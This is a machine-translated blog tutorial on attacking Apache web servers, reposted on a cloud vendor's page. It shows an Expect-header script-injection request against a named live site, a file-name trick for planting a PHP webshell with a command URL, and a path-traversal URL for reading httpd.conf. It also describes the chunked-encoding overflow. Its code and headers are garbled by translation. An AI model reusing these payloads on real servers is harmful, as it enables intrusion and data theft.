Web security practices (9) attack apache

Source: Internet
Author: User


Author: Xuan soul

 

 

 

Series navigation http://www.cnblogs.com/xuanhun/archive/2008/10/25/1319523.html

Security Technology Zone http://space.cnblogs.com/group/group_detail.aspx? Gid = 100566

Preface

The web security practice series focuses on the practical research and some programming implementation of the content of hacker exposure-web Application Security secrets and solutions (version 2. So if you fully understand this book, you can skip this article.


The vulnerabilities provided this time have been accumulated at ordinary times, but I have only a few actual vulnerabilities, with limited time and energy. I hope you can provide and discuss more technical issues.

Body

 

9.1Expect cross-site Vulnerability

Apache will directly output the error message of the header when receiving the HTTP header, and the content of the error message is not escaped. This vulnerability was supposed to disappear with the upgrade of apathe. However, I found many php servers on the Internet and found that there were still some problems.

Perform a simple test on the website http://safesurf.china.cn/data_form.php. Send the following request:

Get_form.php HTTP/1.1

Host: safesurf.china.cn

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv: 1.9.0.3) Gecko/2008092417 Firefox/3.0.3

Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8

Accept-Language: zh-cn

Accept-Encoding: gzip, deflate

Accept-Charset: gb2312, UTF-8; q = 0.7, *; q = 0.7

Keep-Alive: 300

Connection: keep-alive

CT: abcd

I added a response CT: abcd request at the end. The result is as follows:

 

HTTP/1.x 417 Expectation Failed

Date: Wed, 12 Nov 2008 01:46:21 GMT

Server: Apache/1.3.29 (Unix) PHP/4.3.4

Keep-Alive: timeout = 15, max = 100

Connection: Keep-Alive

Transfer-Encoding: chunked

Content-Type: text/html; charset = iso-8859-1

 

We can see that "wrong CT: abcd" in the error message is the request we submitted. At this time, we should consider whether there is a cross-site vulnerability and continue testing.

Send the request (note the final round CT request ):

Get_form.php HTTP/1.1

Host: safesurf.china.cn

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv: 1.9.0.3) Gecko/2008092417 Firefox/3.0.3

Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8

Accept-Language: zh-cn

Accept-Encoding: gzip, deflate

Accept-Charset: gb2312, UTF-8; q = 0.7, *; q = 0.7

Keep-Alive: 300

Connection: keep-alive

Secondary CT: <script language = "javascript"> alert ('hello') </script>

Response:

HTTP/1.x 417 Expectation Failed

Date: Wed, 12 Nov 2008 01:53:34 GMT

Server: Apache/1.3.29 (Unix) PHP/4.3.4

Keep-Alive: timeout = 15, max = 100

Connection: Keep-Alive

Transfer-Encoding: chunked

Content-Type: text/html; charset = iso-8859-1

 

This proves that the server has a Cross-Site vulnerability. We will discuss cross-site attacks in the future. I am not sure whether it is appropriate to expose the specific website?

9.2php File Name Parsing Vulnerability

File names starting with. php, such as index. php. en and index. php. fr, can be parsed as PHP. This is an old vulnerability. I will explain it in an article on the Internet.

 

"Mg 2 is a popular PHP + HTML image management program in foreign countries. Due to the commercial version being cracked, the program has been widely spread,
Search for the keyword "owered by zrv0.5.1" on google"
The latest version has the file Write vulnerability, which can be configured with the Apache vulnerability directly by using shell.

The addcomment () function in includes/maid is as follows:
Function addcomment (){
$ _ REQUEST ['filename'] = $ this-> charfix ($ _ REQUEST ['filename']);
$ _ REQUEST ['input'] = $ this-> charfix ($ _ REQUEST ['input']);
$ _ REQUEST ['email '] = $ this-> charfix ($ _ REQUEST ['email']);
$ _ REQUEST ['name'] = $ this-> charfix ($ _ REQUEST ['name']);
$ _ REQUEST ['input'] = strip_tags ($ _ REQUEST ['input'], "");
$ _ REQUEST ['input'] = str_replace ("\ n", "", $ _ REQUEST ['input']);
$ _ REQUEST ['input'] = str_replace ("\ r", "", $ _ REQUEST ['input']);
If ($ _ request ['input']! = "" & $ _ Request ['name']! = "" & $ _ Request ['email ']! = ""){
$ This-> readcomments ("pictures/". $ _ request ['filename']. ". Comment ");
$ Comment_exists = $ this-> select ($ _ request ['input'], $ this-> comments, 3, 1, 0 );
$ Comment_exists = $ this-> select ($ _ request ['name'], $ comment_exists, 1, 1, 0 );
$ Comment_exists = $ this-> select ($ _ request ['email '], $ comment_exists, 2, 1, 0 );
If (count ($ comment_exists) = 0 ){
$ This-> comments [] = array (Time (), $ _ request ['name'], $ _ request ['email '], $ _ request ['input']);
$ This-> writecomments ($ _ request ['filename']. ". Comment ");
........

The vulnerability is obvious. You can customize the comment file name. If your custom filename is ". php", the program will
The image root directory generates a ". php. Comment" file. Due to Apache vulnerabilities, this program is parsed as a PHP file, and webshell is ready,
Write a exploitation program as follows:

After submission, a file ". php. Comment" containing a trojan is generated under the root directory of the image"
[Url = http: // localhost/mg/pictures/. php. Comment? Cmd = phpinfo] http: // localhost/Mg 2/pictures/. php. Comment? Cmd = phpinfo [/url] ();"

 

9.3 chunked remote code Overflow Vulnerability

This is a vulnerability that occurred around years ago, but it still seems that this vulnerability still exists and harms many websites.

Apache has a design vulnerability in processing HTTP requests that transmit data in chunked mode, remote attackers may exploit this vulnerability to execute arbitrary commands or perform DoS attacks on some Apache servers with the permissions of Web server processes.
Chunked Encoding transmission is a method defined in HTTP 1.1 for Web users to submit data to the server, when the server receives chunked encoding data, it will allocate a buffer to store it. If the submitted data size is unknown, the client will submit the data to the server with a negotiated block size.
The Apache server also supports chunked encoding by default. Apache uses a signed variable to store the part length, and allocates a fixed-size stack buffer to store the part data. For security reasons, Apache checks the block length before copying the block data to the buffer zone. If the block length is greater than the buffer length, Apache copies the data of the buffer length at most, otherwise, data is copied Based on the part length. However, during the above checks, the part length is not converted to the unsigned type for comparison. Because of this, if an attacker sets the part length to a negative value, the above security check will be bypassed, apache will copy a piece of data that is too long (at least> 0x80000000 bytes) to the slow-forward zone, which will cause a buffer overflow.
For Apache 2.0 to 2.0.36 (including 2.0.36), although the same problematic code exists, it detects the conditions for the error and causes the sub-process to exit.
Depending on different factors, including the impact of the thread mode supported by the affected system, this vulnerability can cause Apache Web servers running in various operating systems to reject services.

 

The Retina Apache Chunked vulnerability is an Apache block encoding buffer overflow vulnerability scanning software developed by eEye. It can scan 254 IP addresses at The same time. If it finds a vulnerable IP address, the system administrator can fix the vulnerability by double-clicking the IP address ..

You can also find the overflow program and source code about this vulnerability on the Internet, and search for "Apache Exploit" in Google for more information. With these two things, the problem is much simpler.

In addition, it should be noted that if we do not select "show only... "If that option is selected, the software will tell us all the web server types in the CIDR block.

9.3 Php 3 File leakage Vulnerability

It is found that a security vulnerability exists in the Apache Web Server using the PHP3 script.
By sending a specified URL through php, a user can obtain the read permission for a known object on the target machine. Successful exploitation of this vulnerability may cause leakage of sensitive information and facilitate further attacks.
Example: (Windows 2000 + Apache 1.3.6 + PHP3)
Provide the following urls:
Http: // taget/index. php3. % 5c.../.. % 5 cconf/httpd. conf
You can view the httpd. conf file.

I have not performed any practical operations on the following vulnerabilities, so I have no right to post my experiences and provide reference. I hope you can provide relevant practical experience and materials.

9.4 Error Log escape sequence Injection Vulnerability

See http://blog.ixpub.net/html/95/13151495-338483.html

9.5 MIME Boundary Remote Information Leakage Vulnerability

See http://netsecurity.51cto.com/art/200508/5931.htm

9.6 ETag Header Remote Information Leakage Vulnerability

See http://netsecurity.51cto.com/art/200508/5931.htm

9.7 Mod_Auth_Any Remote Command Execution Vulnerability

See http://www.nsfocus.net/vulndb/4774

9.8 The mod_proxy_http module responds to a denial of service vulnerability.

For details, seeHttp://secunia.com/advisories/30621/

 

 

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.